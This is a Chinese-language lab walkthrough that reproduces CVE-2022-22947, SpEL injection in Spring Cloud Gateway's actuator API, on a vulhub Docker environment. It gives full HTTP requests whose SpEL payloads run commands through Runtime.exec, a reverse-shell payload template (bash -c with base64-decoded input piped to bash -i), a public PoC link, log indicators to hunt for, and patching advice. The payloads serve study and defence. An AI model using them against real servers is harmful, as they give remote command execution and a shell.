概述
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
影响范围
3.1.0
3.0.0至3.0.6
3.0.0之前的版本
环境搭建
这里使用vulhub的环境,一键搭建
[root@VM-0-15-centos CVE-2022-22947]# docker-compose up -d Starting cve202222947_spring_1 ... done [root@VM-0-15-centos CVE-2022-22947]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES b02f988b0d4a vulhub/spring-cloud-gateway:3.1.0 "java -Djava.securit…" 7 days ago Up 9 seconds 0.0.0.0:8070->8080/tcp cve202222947_spring_1
访问8070端口

漏洞复现
以POST方法请求“/actuator/gateway/routes/pentest,并构建如下数据包,用以创建一条恶意路由
POST /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "pentest",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "X-Request-Foo",
"": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(getRuntime().exec(new String[]{"id"}).getInputStream()))}"
},
"uri": "http://httpbin.org/get",
"predicates": [
{
"name": "Method",
"args": {
"_key_0": "GET"
}
},
{
"name": "Path",
"args": {
"_key_0": "/pentest"
}
}
]
}
]
}
id 字段指定新路由的名称,必须全局唯一。
filters 字段给这条路由指定若干个过滤器。过滤器用于对请求和响应进行修改。
name 字段指定要添加的过滤器,这里添加了一个 AddResponseHeader 过滤器,用于 gateway 给客户端返回响应之前添加一个响应头。
args.name 字段指定要添加的响应头。
args.value 字段指定响应头的值。这里的值是要执行的 SpEL 表达式,用于执行 id 命令。注意需要将命令输出结尾的换行符去掉,否则过滤器执行时会抛出异常说「响应头的值不能以 \r 或 \n 结尾」。
uri 字段指定将客户端请求转发到 http://example.com。
predicates 字段指定匹配此路由的条件。这里指定了两个条件,一个是请求的方法为 GET,一个是请求的 URI 为 /pentest。(我这里后续未指定这个值)
手工探测漏洞
首先发送如下数据包添加一个包含恶意SpEL表达式的路由:
POST /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 329
{
"id": "testtest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

发送如下数据包即可查看执行结果:
GET /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

最后,发送如下数据包清理现场,删除所添加的路由

再次刷新路由

请求原先的路由,会提示找不到

获取shell
上述第一步构造数据包
"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,<strong><em>此处为反弹命令的base64编码</em></strong>}|{base64,-d}|{bash,-i}").getInputStream()))}"
后续步骤一样,刷新路由,访问路由(404),删除路由,刷新路由


github上也有完整的脚本,这里引用的是:https://github.com/chaosec2021/CVE-2022-22947-POC
应急排查
如之前的spring插件一样,spring本身是不会记录访问日志的,故无访问日志可查,如果有中间设备保留有web日志记录,可探测关键字”/autuator/gateway/routes””/autuator/gateway/routes/refresh”和”DELETE“请求包。
加固建议
下载官方安全版本
禁用actuator gateway